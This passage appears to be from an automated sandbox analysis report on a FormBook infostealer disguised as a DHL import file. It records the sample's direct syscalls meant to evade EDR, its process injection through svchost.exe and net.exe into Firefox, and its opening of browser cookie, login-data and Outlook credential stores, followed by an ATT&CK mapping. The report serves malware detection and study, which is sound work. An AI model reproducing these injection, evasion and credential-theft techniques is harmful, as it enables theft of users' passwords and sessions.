                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930887 mov eax, dword ptr fs:[00000030h]2_2_03930887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E8C0 mov eax, dword ptr fs:[00000030h]2_2_0395E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A008C0 mov eax, dword ptr fs:[00000030h]2_2_03A008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]2_2_0396C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]2_2_0396C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA8E4 mov eax, dword ptr fs:[00000030h]2_2_039FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC810 mov eax, dword ptr fs:[00000030h]2_2_039BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov ecx, dword ptr fs:[00000030h]2_2_03952835
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_00830B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00830B62
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_00802622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00802622
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007F083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007F083F
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007F09D5 SetUnhandledExceptionFilter,0_2_007F09D5
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007F0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_007F0C21

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtTerminateProcess: Direct from: 0x76F02D5CJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\net.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\net.exeThread register set: target process: 3756Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\net.exeThread APC queued: target process: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2FD3008Jump to behavior
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_00831201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00831201
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_00812BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00812BA5
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0083B226 SendInput,keybd_event,0_2_0083B226
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_008522DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_008522DA
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe"Jump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeProcess created: C:\Windows\SysWOW64\wusa.exe "C:\Windows\SysWOW64\wusa.exe"Jump to behavior
                Source: C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_00830B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00830B62
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_00831663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00831663
                Source: DHL_IMPORT_8236820594.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: DHL_IMPORT_8236820594.exe, AUHJGnjYgKTjWw.exe, 00000005.00000002.3518168062.0000000001130000.00000002.00000001.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000005.00000000.2012880044.0000000001131000.00000002.00000001.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518170839.0000000001200000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: AUHJGnjYgKTjWw.exe, 00000005.00000002.3518168062.0000000001130000.00000002.00000001.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000005.00000000.2012880044.0000000001131000.00000002.00000001.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518170839.0000000001200000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: AUHJGnjYgKTjWw.exe, 00000005.00000002.3518168062.0000000001130000.00000002.00000001.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000005.00000000.2012880044.0000000001131000.00000002.00000001.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518170839.0000000001200000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: AUHJGnjYgKTjWw.exe, 00000005.00000002.3518168062.0000000001130000.00000002.00000001.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000005.00000000.2012880044.0000000001131000.00000002.00000001.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518170839.0000000001200000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007F0698 cpuid 0_2_007F0698
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_00848195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00848195
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0082D27A GetUserNameW,0_2_0082D27A
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0080BB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0080BB6F
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_007D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007D42DE

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2108161360.0000000003820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3518328881.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3518268838.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3517222370.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3518477270.0000000003CC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2108497197.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2107863042.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3520205826.0000000004FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\net.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: DHL_IMPORT_8236820594.exeBinary or memory string: WIN_81
                Source: DHL_IMPORT_8236820594.exeBinary or memory string: WIN_XP
                Source: DHL_IMPORT_8236820594.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: DHL_IMPORT_8236820594.exeBinary or memory string: WIN_XPe
                Source: DHL_IMPORT_8236820594.exeBinary or memory string: WIN_VISTA
                Source: DHL_IMPORT_8236820594.exeBinary or memory string: WIN_7
                Source: DHL_IMPORT_8236820594.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2108161360.0000000003820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3518328881.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3518268838.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3517222370.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3518477270.0000000003CC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2108497197.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2107863042.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3520205826.0000000004FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_00851204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00851204
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_00851806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00851806

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Command and Scripting Interpreter                		2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets241
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials12
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
